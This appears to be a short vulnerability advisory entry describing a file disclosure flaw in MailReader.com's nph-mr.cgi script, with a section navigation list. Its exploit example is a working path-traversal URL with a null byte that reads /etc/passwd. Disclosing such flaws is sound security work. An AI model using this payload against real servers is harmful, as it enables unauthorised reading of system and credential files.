MailReader.com NPH-MR.CGI File Disclosure Vulnerability

info
discussion
exploit
solution
references

MailReader.com NPH-MR.CGI File Disclosure Vulnerability

This issue may be exploited with a web browser. The following example was provided:

http://www.example.com/cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00